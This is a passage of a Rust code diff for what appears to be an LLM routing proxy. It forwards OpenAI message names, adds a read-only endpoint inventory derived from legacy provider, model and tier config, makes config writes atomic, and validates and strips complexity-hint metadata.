+    for (message_index, msg) in request.messages.iter().enumerate() {
         if msg.role == "system" {
             tracing::debug!(
                 "Dropping system-role message from canonical messages array (already hoisted to top-level system)"
@@ -107,13 +108,25 @@ pub(crate) fn transform_request(
                 openai_messages.push(OpenAIMessage {
                     role: msg.role.clone(),
                     content: Some(OpenAIContent::String(text.clone())),
+                    name: request
+                        .extensions
+                        .openai_message_names
+                        .get(message_index)
+                        .cloned()
+                        .flatten(),
                     reasoning: None,
                     tool_calls: None,
                     tool_call_id: None,
                 });
             }
             MessageContent::Blocks(blocks) => {
-                transform_block_message(&msg.role, blocks, &mut openai_messages)?;
+                let name = request
+                    .extensions
+                    .openai_message_names
+                    .get(message_index)
+                    .cloned()
+                    .flatten();
+                transform_block_message(&msg.role, name, blocks, &mut openai_messages)?;
             }
         }
     }
@@ -171,6 +184,7 @@ pub(crate) fn transform_request(
 /// Transform a message with content blocks into OpenAI messages.
 fn transform_block_message(
     role: &str,
+    name: Option<String>,
     blocks: &[ContentBlock],
     openai_messages: &mut Vec<OpenAIMessage>,
 ) -> Result<(), TransformError> {
@@ -183,6 +197,7 @@ fn transform_block_message(
         openai_messages.push(OpenAIMessage {
             role: "tool".to_string(),
             content: Some(OpenAIContent::String(result_content)),
+            name: None,
             reasoning: None,
             tool_calls: None,
             tool_call_id: Some(tool_use_id),
@@ -206,6 +221,7 @@ fn transform_block_message(
         openai_messages.push(OpenAIMessage {
             role: role.to_string(),
             content,
+            name,
             reasoning: None,
             tool_calls: if tool_calls.is_empty() {
                 None

--- a/src/providers/openai/types.rs
+++ b/src/providers/openai/types.rs
@@ -174,6 +174,8 @@ pub(crate) struct OpenAIMessage {
     #[serde(skip_serializing_if = "Option::is_none")]
     pub content: Option<OpenAIContent>,
     #[serde(skip_serializing_if = "Option::is_none")]
+    pub name: Option<String>,
+    #[serde(skip_serializing_if = "Option::is_none")]
     pub reasoning: Option<String>,
     #[serde(skip_serializing_if = "Option::is_none")]
     pub tool_calls: Option<Vec<OpenAIToolCall>>,

--- a/src/routing/endpoints.rs
+++ b/src/routing/endpoints.rs
@@ -1,0 +1,516 @@
+//! Read-only endpoint inventory derived from the legacy routing schema.
+//!
+//! This is ADR-0022 phase 0: expose a deterministic endpoint-shaped view of the
+//! current `[[providers]]`, `[[models]]`, and `[[tiers]]` configuration without
+//! adding a public `[[endpoints]]` TOML schema or changing dispatch behavior.
+//!
+//! The adapter is intentionally read-only. It is useful for migration previews,
+//! golden tests, and future observability, while the runtime resolver continues
+//! to use the legacy routing code until the migration path is proven.
+
+use std::collections::BTreeMap;
+
+use crate::config::AppConfig;
+
+/// Read-only endpoint/policy view derived from legacy config.
+#[derive(Debug, Clone, PartialEq, Eq)]
+pub struct EndpointInventory {
+    /// Physical provider/model or provider/pass-through endpoints.
+    pub endpoints: Vec<DerivedEndpoint>,
+    /// Logical routing policies derived from `[[models]]` and `[[tiers]]`.
+    pub policies: Vec<DerivedPolicy>,
+}
+
+impl EndpointInventory {
+    /// Builds a deterministic read-only endpoint inventory from the legacy
+    /// `[[providers]]`, `[[models]]`, and `[[tiers]]` schema.
+    #[must_use]
+    pub fn from_legacy_config(config: &AppConfig) -> Self {
+        let provider_lookup: BTreeMap<&str, &crate::cli::ProviderConfig> = config
+            .providers
+            .iter()
+            .map(|provider| (provider.name.as_str(), provider))
+            .collect();
+
+        let mut builder = EndpointBuilder::new(&provider_lookup);
+
+        for model in &config.models {
+            for mapping in &model.mappings {
+                builder.add_exact(
+                    &mapping.provider,
+                    &mapping.actual_model,
+                    EndpointSource::ModelMapping {
+                        model: model.name.clone(),
+                        priority: mapping.priority,
+                    },
+                );
+            }
+        }
+
+        for provider in &config.providers {
+            for model in &provider.models {
+                builder.add_exact(
+                    &provider.name,
+                    model,
+                    EndpointSource::ProviderModel {
+                        provider: provider.name.clone(),
+                    },
+                );
+            }
+            if provider.pass_through.unwrap_or(false) {
+                builder.add_pass_through(
+                    &provider.name,
+                    EndpointSource::PassThroughProvider {
+                        provider: provider.name.clone(),
+                    },
+                );
+            }
+        }
+
+        let endpoints = builder.finish();
+        let endpoint_by_pair: BTreeMap<(String, EndpointModel), String> = endpoints
+            .iter()
+            .map(|endpoint| {
+                (
+                    (endpoint.provider.clone(), endpoint.model.clone()),
+                    endpoint.id.clone(),
+                )
+            })
+            .collect();
+
+        let mut policies = Vec::new();
+
+        for model in &config.models {
+            let mut mappings = model.mappings.clone();
+            mappings.sort_by_key(|mapping| mapping.priority);
+            let endpoint_ids = mappings
+                .iter()
+                .filter_map(|mapping| {
+                    endpoint_by_pair
+                        .get(&(
+                            mapping.provider.clone(),
+                            EndpointModel::Exact(mapping.actual_model.clone()),
+                        ))
+                        .cloned()
+                })
+                .collect();
+
+            policies.push(DerivedPolicy {
+                name: format!("model:{}", model.name),
+                source: PolicySource::Model {
+                    model: model.name.clone(),
+                },
+                match_model: Some(model.name.clone()),
+                endpoint_ids,
+                provider_order: mappings
+                    .into_iter()
+                    .map(|mapping| mapping.provider)
+                    .collect(),
+                fanout: model.strategy == crate::cli::ModelStrategy::FanOut,
+            });
+        }
+
+        for tier in &config.tiers {
+            let provider_order = tier.providers.clone();
+            let endpoint_ids = provider_order
+                .iter()
+                .flat_map(|provider| {
+                    endpoints
+                        .iter()
+                        .filter(move |endpoint| endpoint.provider == *provider)
+                        .map(|endpoint| endpoint.id.clone())
+                })
+                .collect();
+
+            policies.push(DerivedPolicy {
+                name: format!("tier:{}", tier.name),
+                source: PolicySource::Tier {
+                    tier: tier.name.clone(),
+                },
+                match_model: None,
+                endpoint_ids,
+                provider_order,
+                fanout: tier.fanout,
+            });
+        }
+
+        Self {
+            endpoints,
+            policies,
+        }
+    }
+}
+
+/// A physical endpoint derived from legacy config.
+#[derive(Debug, Clone, PartialEq, Eq)]
+pub struct DerivedEndpoint {
+    /// Stable adapter-local endpoint id.
+    pub id: String,
+    /// Legacy provider name.
+    pub provider: String,
+    /// Provider backend type, copied from `[[providers]]` when available.
+    pub provider_type: String,
+    /// Exact model or pass-through wildcard.
+    pub model: EndpointModel,
+    /// Provider region, defaulting to `"global"` like dispatch does.
+    pub region: String,
+    /// Provider enabled flag after applying legacy default semantics.
+    pub enabled: bool,
+    /// Sources that caused this endpoint to be present in the derived view.
+    pub sources: Vec<EndpointSource>,
+}
+
+/// Endpoint model identity in the read-only adapter.
+#[derive(Debug, Clone, PartialEq, Eq, PartialOrd, Ord)]
+pub enum EndpointModel {
+    /// Exact upstream model string.
+    Exact(String),
+    /// Provider accepts arbitrary model names.
+    PassThrough,
+}
+
+impl EndpointModel {
+    fn id_fragment(&self) -> &str {
+        match self {
+            Self::Exact(model) => model,
+            Self::PassThrough => "pass-through",
+        }
+    }
+}
+
+/// Where a derived endpoint came from.
+#[derive(Debug, Clone, PartialEq, Eq)]
+pub enum EndpointSource {
+    /// `[[models.mappings]]` entry.
+    ModelMapping {
+        /// Logical Grob model name.
+        model: String,
+        /// Legacy mapping priority.
+        priority: u32,
+    },
+    /// Legacy `models = [...]` field on `[[providers]]`.
+    ProviderModel {
+        /// Provider name owning the model list.
+        provider: String,
+    },
+    /// `pass_through = true` on `[[providers]]`.
+    PassThroughProvider {
+        /// Provider name owning pass-through behavior.
+        provider: String,
+    },
+}
+
+/// Logical policy derived from legacy routing config.
+#[derive(Debug, Clone, PartialEq, Eq)]
+pub struct DerivedPolicy {
+    /// Adapter-local policy name.
+    pub name: String,
+    /// Legacy source of the policy.
+    pub source: PolicySource,
+    /// Exact requested model match for model policies. Tier policies are
+    /// request-dependent and therefore leave this unset.
+    pub match_model: Option<String>,
+    /// Candidate endpoint ids known statically. Tier policies also keep
+    /// `provider_order` because their exact upstream model is resolved at
+    /// request time in the legacy resolver.
+    pub endpoint_ids: Vec<String>,
+    /// Provider order preserved from legacy priority/tier configuration.
+    pub provider_order: Vec<String>,
+    /// Whether this policy fans out.
+    pub fanout: bool,
+}
+
+/// Source of a derived policy.
+#[derive(Debug, Clone, PartialEq, Eq)]
+pub enum PolicySource {
+    /// `[[models]]` entry.
+    Model {
+        /// Logical Grob model name.
+        model: String,
+    },
+    /// `[[tiers]]` entry.
+    Tier {
+        /// Tier name.
+        tier: String,
+    },
+}
+
+struct EndpointBuilder<'a> {
+    provider_lookup: &'a BTreeMap<&'a str, &'a crate::cli::ProviderConfig>,
+    entries: BTreeMap<(String, EndpointModel), DerivedEndpoint>,
+}
+
+impl<'a> EndpointBuilder<'a> {
+    fn new(provider_lookup: &'a BTreeMap<&'a str, &'a crate::cli::ProviderConfig>) -> Self {
+        Self {
+            provider_lookup,
+            entries: BTreeMap::new(),
+        }
+    }
+
+    fn add_exact(&mut self, provider: &str, model: &str, source: EndpointSource) {
+        self.add(provider, EndpointModel::Exact(model.to_string()), source);
+    }
+
+    fn add_pass_through(&mut self, provider: &str, source: EndpointSource) {
+        self.add(provider, EndpointModel::PassThrough, source);
+    }
+
+    fn add(&mut self, provider: &str, model: EndpointModel, source: EndpointSource) {
+        let key = (provider.to_string(), model.clone());
+        if let Some(existing) = self.entries.get_mut(&key) {
+            existing.sources.push(source);
+            return;
+        }
+
+        let provider_config = self.provider_lookup.get(provider).copied();
+        self.entries.insert(
+            key,
+            DerivedEndpoint {
+                id: endpoint_id(provider, &model),
+                provider: provider.to_string(),
+                provider_type: provider_config
+                    .map(|p| p.provider_type.clone())
+                    .unwrap_or_else(|| "unknown".to_string()),
+                model,
+                region: provider_config
+                    .and_then(|p| p.region.clone())
+                    .unwrap_or_else(|| "global".to_string()),
+                enabled: provider_config.map(|p| p.is_enabled()).unwrap_or(true),
+                sources: vec![source],
+            },
+        );
+    }
+
+    fn finish(self) -> Vec<DerivedEndpoint> {
+        self.entries.into_values().collect()
+    }
+}
+
+fn endpoint_id(provider: &str, model: &EndpointModel) -> String {
+    format!("{}__{}", slug(provider), slug(model.id_fragment()))
+}
+
+fn slug(input: &str) -> String {
+    let mut out = String::new();
+    let mut last_dash = false;
+    for byte in input.bytes() {
+        let ch = byte as char;
+        let next = if ch.is_ascii_alphanumeric() {
+            last_dash = false;
+            ch.to_ascii_lowercase()
+        } else if matches!(ch, '.' | '_' | '-') {
+            last_dash = false;
+            ch
+        } else if !last_dash {
+            last_dash = true;
+            '-'
+        } else {
+            continue;
+        };
+        out.push(next);
+    }
+    let trimmed = out.trim_matches('-');
+    if trimmed.is_empty() {
+        "endpoint".to_string()
+    } else {
+        trimmed.to_string()
+    }
+}
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+    use crate::cli::{ModelConfig, ModelMapping, TierConfig};
+
+    fn provider(name: &str, models: &[&str]) -> crate::cli::ProviderConfig {
+        crate::cli::ProviderConfig {
+            name: name.to_string(),
+            provider_type: "openai".to_string(),
+            auth_type: crate::cli::AuthType::ApiKey,
+            api_key: None,
+            oauth_provider: None,
+            project_id: None,
+            location: None,
+            base_url: None,
+            headers: None,
+            models: models.iter().map(|m| (*m).to_string()).collect(),
+            enabled: Some(true),
+            budget_usd: None,
+            region: None,
+            pass_through: None,
+            reasoning_effort: None,
+            service_tier: None,
+            codex: crate::cli::CodexOptions::default(),
+            tls_cert: None,
+            tls_key: None,
+            tls_ca: None,
+            pool: None,
+            circuit_breaker: None,
+            health_check: None,
+            max_retries: None,
+        }
+    }
+
+    fn mapping(priority: u32, provider: &str, actual_model: &str) -> ModelMapping {
+        ModelMapping {
+            priority,
+            provider: provider.to_string(),
+            actual_model: actual_model.to_string(),
+            inject_continuation_prompt: false,
+        }
+    }
+
+    fn config() -> AppConfig {
+        AppConfig {
+            router: crate::cli::RouterConfig {
+                default: "smart".to_string(),
+                background: None,
+                think: None,
+                websearch: None,
+                auto_map_regex: None,
+                background_regex: None,
+                prompt_rules: vec![],
+                gdpr: false,
+                region: None,
+            },
+            providers: vec![
+                provider("anthropic", &[]),
+                provider("openrouter", &["mistral/a"]),
+            ],
+            models: vec![ModelConfig {
+                name: "smart".to_string(),
+                mappings: vec![
+                    mapping(2, "openrouter", "anthropic/claude-sonnet"),
+                    mapping(1, "anthropic", "claude-sonnet"),
+                ],
+                budget_usd: None,
+                strategy: crate::cli::ModelStrategy::Fallback,
+                fan_out: None,
+                deprecated: None,
+            }],
+            tiers: vec![TierConfig {
+                name: "trivial".to_string(),
+                providers: vec!["openrouter".to_string(), "anthropic".to_string()],
+                fanout: true,
+                match_conditions: None,
+            }],
+            server: Default::default(),
+            classifier: None,
+            presets: Default::default(),
+            budget: Default::default(),
+            pricing: Default::default(),
+            dlp: Default::default(),
+            auth: Default::default(),
+            tap: Default::default(),
+            security: Default::default(),
+            cache: Default::default(),
+            secrets: Default::default(),
+            compliance: Default::default(),
+            version: None,
+            user: Default::default(),
+            otel: Default::default(),
+            log_export: Default::default(),
+            pledge: Default::default(),
+            policies: vec![],
+            tool_layer: Default::default(),
+            tee: Default::default(),
+            fips: Default::default(),
+            #[cfg(feature = "harness")]
+            harness: Default::default(),
+            #[cfg(feature = "mcp")]
+            mcp: Default::default(),
+        }
+    }
+
+    #[test]
+    fn derives_exact_endpoints_from_model_mappings_and_provider_models() {
+        let inventory = EndpointInventory::from_legacy_config(&config());
+        let ids: Vec<&str> = inventory
+            .endpoints
+            .iter()
+            .map(|endpoint| endpoint.id.as_str())
+            .collect();
+
+        assert_eq!(
+            ids,
+            vec![
+                "anthropic__claude-sonnet",
+                "openrouter__anthropic-claude-sonnet",
+                "openrouter__mistral-a",
+            ]
+        );
+
+        let openrouter_sonnet = inventory
+            .endpoints
+            .iter()
+            .find(|endpoint| endpoint.id == "openrouter__anthropic-claude-sonnet")
+            .unwrap();
+        assert_eq!(openrouter_sonnet.provider_type, "openai");
+        assert_eq!(openrouter_sonnet.region, "global");
+        assert!(matches!(
+            openrouter_sonnet.sources.as_slice(),
+            [EndpointSource::ModelMapping { model, priority }] if model == "smart" && *priority == 2
+        ));
+    }
+
+    #[test]
+    fn derives_model_policy_in_priority_order() {
+        let inventory = EndpointInventory::from_legacy_config(&config());
+        let policy = inventory
+            .policies
+            .iter()
+            .find(|policy| policy.name == "model:smart")
+            .unwrap();
+
+        assert_eq!(policy.match_model.as_deref(), Some("smart"));
+        assert_eq!(
+            policy.endpoint_ids,
+            vec![
+                "anthropic__claude-sonnet".to_string(),
+                "openrouter__anthropic-claude-sonnet".to_string()
+            ]
+        );
+        assert_eq!(policy.provider_order, vec!["anthropic", "openrouter"]);
+        assert!(!policy.fanout);
+    }
+
+    #[test]
+    fn derives_tier_policy_without_claiming_exact_runtime_model_resolution() {
+        let inventory = EndpointInventory::from_legacy_config(&config());
+        let policy = inventory
+            .policies
+            .iter()
+            .find(|policy| policy.name == "tier:trivial")
+            .unwrap();
+
+        assert_eq!(policy.match_model, None);
+        assert_eq!(policy.provider_order, vec!["openrouter", "anthropic"]);
+        assert!(policy.fanout);
+        assert!(
+            policy
+                .endpoint_ids
+                .contains(&"openrouter__anthropic-claude-sonnet".to_string()),
+            "tier policies expose provider inventory but keep request-time model resolution separate"
+        );
+    }
+
+    #[test]
+    fn derives_pass_through_endpoint() {
+        let mut config = config();
+        config.providers[0].pass_through = Some(true);
+
+        let inventory = EndpointInventory::from_legacy_config(&config);
+
+        let endpoint = inventory
+            .endpoints
+            .iter()
+            .find(|endpoint| endpoint.id == "anthropic__pass-through")
+            .unwrap();
+        assert_eq!(endpoint.model, EndpointModel::PassThrough);
+        assert!(matches!(
+            endpoint.sources.as_slice(),
+            [EndpointSource::PassThroughProvider { provider }] if provider == "anthropic"
+        ));
+    }
+}

--- a/src/routing/mod.rs
+++ b/src/routing/mod.rs
@@ -18,9 +18,10 @@
 //! Future phases (tracked in ADR-0018):
 //!
 //! - RE-1c cooldown + half-open probes.
-//! - RE-2 EMA stats per endpoint.
+//! - RE-2 provider scoring v1 (implemented in `security::provider_scorer`);
+//!   endpoint-level EMA is deferred until ADR-0022 migration.
 //! - RE-3 hedged requests.
-//! - RE-4 Thompson sampling bandit.
+//! - RE-4 Thompson sampling bandit (rejected/deferred).
 //!
 //! [adr]: ../../../docs/decisions/0018-nature-inspired-routing.md
 
@@ -30,8 +31,14 @@ pub mod classify;
 /// Passive per-endpoint circuit breaker (RE-1a, Caddy-style).
 pub mod circuit_breaker;
 
+/// Read-only endpoint-shaped adapter derived from legacy config (ADR-0022 phase 0).
+pub mod endpoints;
+
 /// Active per-provider health checker (RE-1b, Caddy-style).
 pub mod health_check;
 
 pub use circuit_breaker::{CircuitBreaker, CircuitBreakerConfig, EndpointId};
+pub use endpoints::{
+    DerivedEndpoint, DerivedPolicy, EndpointInventory, EndpointModel, EndpointSource, PolicySource,
+};
 pub use health_check::{HealthCheckConfig, HealthChecker, HealthStatus, StatusMatcher};

--- a/src/server/config_guard.rs
+++ b/src/server/config_guard.rs
@@ -137,9 +137,15 @@ pub async fn persist_and_reload(
         super::RequestError::Internal(anyhow::anyhow!("Failed to serialize config: {e}"))
     })?;
 
-    tokio::fs::write(config_path, toml_str).await.map_err(|e| {
-        super::RequestError::Internal(anyhow::anyhow!("Failed to write config: {e}"))
-    })?;
+    let config_path_for_write = config_path.to_path_buf();
+    tokio::task::spawn_blocking(move || {
+        crate::storage::atomic::write_atomic(&config_path_for_write, toml_str.as_bytes())
+    })
+    .await
+    .map_err(|e| {
+        super::RequestError::Internal(anyhow::anyhow!("Failed to join config write task: {e}"))
+    })?
+    .map_err(|e| super::RequestError::Internal(anyhow::anyhow!("Failed to write config: {e}")))?;
 
     // 3. Hot-reload: rebuild router + provider registry from the new config
     reload_state(state, config.clone(), config_path)?;

--- a/src/server/dispatch/mod.rs
+++ b/src/server/dispatch/mod.rs
@@ -214,34 +214,68 @@ pub(crate) enum DispatchResult {
 #[cfg(feature = "mcp")]
 pub(crate) fn resolve_grob_hint(
     ctx: &DispatchContext<'_>,
-    request: &CanonicalRequest,
-) -> Option<ComplexityHint> {
+    request: &mut CanonicalRequest,
+) -> Result<Option<ComplexityHint>, RequestError> {
     // 1. Header: X-Grob-Hint
-    if let Some(hint) = ctx
-        .headers
-        .get("x-grob-hint")
-        .and_then(|v| v.to_str().ok())
-        .and_then(|s| serde_json::from_value(serde_json::Value::String(s.to_string())).ok())
-    {
-        return Some(hint);
+    if let Some(value) = ctx.headers.get("x-grob-hint") {
+        let raw = value
+            .to_str()
+            .map_err(|_| RequestError::BadRequest("invalid X-Grob-Hint header".to_string()))?;
+        let hint = parse_complexity_hint(serde_json::Value::String(raw.to_string()))
+            .map_err(|msg| RequestError::BadRequest(format!("invalid X-Grob-Hint: {msg}")))?;
+        strip_grob_hint_metadata(request);
+        return Ok(Some(hint));
     }
 
     // 2. Body: metadata.grob_hint
-    if let Some(hint) = request
+    if let Some(value) = request
         .metadata
         .as_ref()
         .and_then(|m| m.get("grob_hint"))
-        .and_then(|v| serde_json::from_value(v.clone()).ok())
+        .cloned()
     {
-        return Some(hint);
+        let hint = parse_complexity_hint(value).map_err(|msg| {
+            RequestError::BadRequest(format!("invalid metadata.grob_hint: {msg}"))
+        })?;
+        strip_grob_hint_metadata(request);
+        return Ok(Some(hint));
     }
 
     // 3. MCP one-shot slot (consume on read)
-    ctx.state
+    Ok(ctx
+        .state
         .grob_hint
         .lock()
         .ok()
-        .and_then(|mut slot| slot.take())
+        .and_then(|mut slot| slot.take()))
+}
+
+#[cfg(feature = "mcp")]
+fn parse_complexity_hint(value: serde_json::Value) -> Result<ComplexityHint, String> {
+    serde_json::from_value(value)
+        .map_err(|_| "expected one of: trivial, medium, complex".to_string())
+}
+
+#[cfg(feature = "mcp")]
+fn strip_grob_hint_metadata(request: &mut CanonicalRequest) {
+    if let Some(metadata) = request.metadata.as_mut() {
+        metadata.remove("grob_hint");
+        if metadata.is_empty() {
+            request.metadata = None;
+        }
+    }
+}
+
+#[cfg(feature = "mcp")]
+fn salt_cache_key_with_grob_hint(
+    cache_key: Option<String>,
+    grob_hint: Option<ComplexityHint>,
+) -> Option<String> {
+    let key = cache_key?;
+    let Some(hint) = grob_hint else {
+        return Some(key);
+    };
+    Some(format!("{key}|grob_hint={hint}"))
 }
 
 /// Returns `true` when a configured tier name matches the request's tier.
@@ -271,10 +305,10 @@ pub(crate) async fn dispatch(
     request: &mut CanonicalRequest,
 ) -> Result<DispatchResult, RequestError> {
     // ── Step 0: Resolve complexity hint ──
-    // Resolved up-front (borrows `request` immutably) but applied post-routing
-    // so the client-declared tier overrides the algorithmic scorer.
+    // Resolved up-front but applied post-routing so the client-declared tier
+    // overrides the algorithmic scorer.
     #[cfg(feature = "mcp")]
-    let grob_hint = resolve_grob_hint(ctx, request);
+    let grob_hint = resolve_grob_hint(ctx, request)?;
 
     // ── Step 1: DLP input scanning ──
     scan_dlp_input(ctx, request)?;
@@ -315,6 +349,8 @@ pub(crate) async fn dispatch(
                 request,
             )
         });
+    #[cfg(feature = "mcp")]
+    let cache_key = salt_cache_key_with_grob_hint(cache_key, grob_hint);
 
     // ── Step 3: Route ──
     #[cfg_attr(not(feature = "mcp"), allow(unused_mut))]
@@ -782,5 +818,15 @@ mod tests {
         // `== ModelStrategy::FanOut`: the `==` → `!=` mutant inverts selection.
         assert!(is_fan_out_strategy(&ModelStrategy::FanOut));
         assert!(!is_fan_out_strategy(&ModelStrategy::Fallback));
+    }
+
+    #[cfg(feature = "mcp")]
+    #[test]
+    fn parse_complexity_hint_rejects_unknown_values() {
+        assert_eq!(
+            parse_complexity_hint(serde_json::json!("trivial")).expect("valid hint"),
+            ComplexityHint::Trivial
+        );
+        assert!(parse_complexity_hint(serde_json::json!("urgent")).is_err());
     }
 }

--- a/src/server/dispatch/resolver.rs
+++ b/src/server/dispatch/resolver.rs
@@ -8,7 +8,8 @@
 
 use std::sync::Arc;
 
-use super::super::RequestError;
+use super::super::{is_auth_revoked_error, RequestError};
+use super::retry::{capture_upstream_error, is_upstream_rate_limit};
 use super::{DispatchContext, DispatchResult};
 use tracing::info;
 
@@ -113,10 +114,17 @@ pub(super) async fn try_direct_provider_lookup(
     let original_model = fallback_request.model.clone();
     fallback_request.model = model_name.to_string();
 
-    let mut response = provider
-        .send_message(fallback_request)
-        .await
-        .map_err(RequestError::from)?;
+    let mut response = provider.send_message(fallback_request).await.map_err(|e| {
+        if is_auth_revoked_error(&e) {
+            RequestError::AuthRevoked(e.to_string())
+        } else if matches!(&e, crate::providers::error::ProviderError::AuthError(_))
+            || is_upstream_rate_limit(&e)
+        {
+            RequestError::from(e)
+        } else {
+            capture_upstream_error(model_name, &e)
+        }
+    })?;
     response.model = original_model;
 
     Ok(Some(DispatchResult::Complete {

--- a/src/server/dispatch/retry.rs
+++ b/src/server/dispatch/retry.rs
@@ -48,7 +48,7 @@ pub(super) enum ProviderLoopAction {
 /// `usage_limit_reached` with `resets_in_seconds`). Keeping status + body here
 /// lets the loop surface the true upstream cause when every mapping fails,
 /// rather than a misleading fallback or a generic 502.
-fn capture_upstream_error(provider: &str, err: &ProviderError) -> RequestError {
+pub(super) fn capture_upstream_error(provider: &str, err: &ProviderError) -> RequestError {
     match err {
         ProviderError::ApiError { status, message } => RequestError::ProviderUpstream {
             provider: provider.to_string(),

--- a/src/server/mcp_handlers/hint.rs
+++ b/src/server/mcp_handlers/hint.rs
@@ -6,10 +6,11 @@ use std::sync::Arc;
 
 /// Handles `grob_hint` — stores a one-shot complexity hint for the next dispatch.
 ///
-/// The hint is consumed (taken) by the next dispatch call, then cleared.
-/// Clients may also pass the hint inline via `X-Grob-Hint` header or
-/// `metadata.grob_hint` in the request body — this MCP tool is the third
-/// pathway, for MCP-native agents that cannot set custom HTTP headers.
+/// The process-wide hint is consumed (taken) by the next dispatch call that
+/// does not already carry a header/body hint, then cleared. Clients may also
+/// pass the hint inline via `X-Grob-Hint` header or `metadata.grob_hint` in
+/// the request body — this MCP tool is the third pathway, for MCP-native
+/// agents that cannot set custom HTTP headers.
 ///
 /// # Errors
 ///

--- a/src/server/mod.rs
+++ b/src/server/mod.rs
@@ -199,7 +199,9 @@ pub struct AppState {
     pub log_exporter: Option<Arc<crate::features::log_export::LogExporter>>,
     /// One-shot complexity hint set by the `grob_hint` MCP tool.
     ///
-    /// Consumed (taken) by the next dispatch call, then reset to `None`.
+    /// Consumed by the next dispatch that does not carry a header/body hint.
+    /// Header/body hints take precedence for their request without consuming
+    /// this slot, preserving the MCP one-shot for the next unhinted dispatch.
     #[cfg(feature = "mcp")]
     pub grob_hint: std::sync::Mutex<Option<crate::features::mcp::server::types::ComplexityHint>>,
     /// Pending HIT approval channels keyed by `"{request_id}:{tool_name}"`.

--- a/src/server/openai_compat/mod.rs
+++ b/src/server/openai_compat/mod.rs
@@ -71,6 +71,7 @@ mod tests {
             stream: None,
             tools: None,
             tool_choice: None,
+            metadata: None,
             response_format: None,
             reasoning_effort: None,
             seed: None,

--- a/src/server/openai_compat/transform.rs
+++ b/src/server/openai_compat/transform.rs
@@ -31,6 +31,15 @@ fn parse_data_uri_image(url: &str) -> Option<ContentBlock> {
     }))
 }
 
+fn internal_metadata(
+    metadata: Option<std::collections::HashMap<String, serde_json::Value>>,
+) -> Option<std::collections::HashMap<String, serde_json::Value>> {
+    metadata.and_then(|mut values| {
+        values.retain(|key, _| key == "grob_hint");
+        (!values.is_empty()).then_some(values)
+    })
+}
+
 /// Converts OpenAI content (string or multi-part) to canonical [`MessageContent`].
 ///
 /// Handles plain text, multi-part text+image, and absent content.
@@ -197,13 +206,17 @@ pub fn transform_openai_to_canonical(
 ) -> Result<CanonicalRequest, String> {
     // Cap pre-allocation to prevent memory exhaustion from malicious input.
     let mut messages = Vec::with_capacity(openai_req.messages.len().min(1024));
+    let mut openai_message_names = Vec::with_capacity(openai_req.messages.len().min(1024));
     let mut system_prompt: Option<SystemPrompt> = None;
+    let mut openai_system_name: Option<String> = None;
 
     for msg in openai_req.messages {
+        let name = msg.name.clone();
         match msg.role.as_str() {
             "system" => {
                 if let Some(content) = msg.content {
                     system_prompt = Some(SystemPrompt::Text(extract_text(content)));
+                    openai_system_name = name;
                 }
             }
             "user" => {
@@ -211,9 +224,11 @@ pub fn transform_openai_to_canonical(
                     role: "user".to_string(),
                     content: openai_content_to_canonical(msg.content),
                 });
+                openai_message_names.push(name);
             }
             "assistant" => {
                 messages.push(convert_assistant_message(msg));
+                openai_message_names.push(name);
             }
             "tool" => {
                 let tool_use_id = msg.tool_call_id.unwrap_or_default();
@@ -241,6 +256,7 @@ pub fn transform_openai_to_canonical(
                     role: "user".to_string(),
                     content: MessageContent::Blocks(vec![block]),
                 });
+                openai_message_names.push(None);
             }
             _ => {
                 tracing::warn!("Skipping unsupported message role: {}", msg.role);
@@ -253,6 +269,7 @@ pub fn transform_openai_to_canonical(
         .unwrap_or_else(|| models::default_max_tokens(&openai_req.model));
 
     let extensions = crate::models::extensions::RequestExtensions {
+        client_beta: None,
         response_format: openai_req.response_format,
         reasoning_effort: openai_req.reasoning_effort,
         seed: openai_req.seed,
@@ -263,7 +280,8 @@ pub fn transform_openai_to_canonical(
         logprobs: openai_req.logprobs,
         top_logprobs: openai_req.top_logprobs,
         service_tier: openai_req.service_tier,
-        ..Default::default()
+        openai_system_name,
+        openai_message_names,
     };
 
     Ok(CanonicalRequest {
@@ -276,7 +294,7 @@ pub fn transform_openai_to_canonical(
         top_k: None,
         stop_sequences: openai_req.stop,
         stream: openai_req.stream,
-        metadata: None,
+        metadata: internal_metadata(openai_req.metadata),
         system: system_prompt,
         tools: openai_req.tools.as_ref().map(|tools| convert_tools(tools)),
         tool_choice: openai_req

--- a/src/server/openai_compat/types.rs
+++ b/src/server/openai_compat/types.rs
@@ -1,4 +1,5 @@
 use serde::{Deserialize, Serialize};
+use std::collections::HashMap;
 
 /// OpenAI Chat Completions request format
 #[derive(Debug, Deserialize)]
@@ -28,6 +29,9 @@ pub struct OpenAIRequest {
     /// Controls how the model selects which tool to call.
     #[serde(skip_serializing_if = "Option::is_none")]
     pub tool_choice: Option<serde_json::Value>,
+    /// Arbitrary request metadata, including internal routing hints.
+    #[serde(default, skip_serializing_if = "Option::is_none")]
+    pub metadata: Option<HashMap<String, serde_json::Value>>,
 
     // ── Extension fields (captured for lossless roundtrip) ──
     /// Structured output format (e.g. `json_schema`, `json_object`).

--- a/src/server/responses_compat/transform.rs
+++ b/src/server/responses_compat/transform.rs
@@ -8,6 +8,15 @@ use crate::providers::ProviderResponse;
 
 use super::types::*;
 
+fn internal_metadata(
+    metadata: Option<std::collections::HashMap<String, serde_json::Value>>,
+) -> Option<std::collections::HashMap<String, serde_json::Value>> {
+    metadata.and_then(|mut values| {
+        values.retain(|key, _| key == "grob_hint");
+        (!values.is_empty()).then_some(values)
+    })
+}
+
 /// Extracts text from [`InputContent`].
 fn extract_input_text(content: &InputContent) -> String {
     match content {
@@ -220,7 +229,7 @@ pub fn transform_responses_to_canonical(req: ResponsesRequest) -> Result<Canonic
         top_k: None,
         stop_sequences: None,
         stream: req.stream,
-        metadata: None,
+        metadata: internal_metadata(req.metadata),
         system: system_prompt,
         tools: req.tools.as_ref().map(|t| convert_tools(t)),
         tool_choice: None,
@@ -313,6 +322,7 @@ mod tests {
             temperature: None,
             top_p: None,
             max_output_tokens: None,
+            metadata: None,
             previous_response_id: None,
             store: None,
             parallel_tool_calls: None,
@@ -356,6 +366,7 @@ mod tests {
             temperature: None,
             top_p: None,
             max_output_tokens: None,
+            metadata: None,
             previous_response_id: None,
             store: None,
             parallel_tool_calls: None,

--- a/src/server/responses_compat/types.rs
+++ b/src/server/responses_compat/types.rs
@@ -2,6 +2,7 @@
 
 use serde::{Deserialize, Serialize};
 use serde_json::Value;
+use std::collections::HashMap;
 
 /// OpenAI Responses API request format (`POST /v1/responses`).
 #[derive(Debug, Deserialize)]
@@ -31,6 +32,9 @@ pub struct ResponsesRequest {
     /// Upper bound on tokens in the response.
     #[serde(default)]
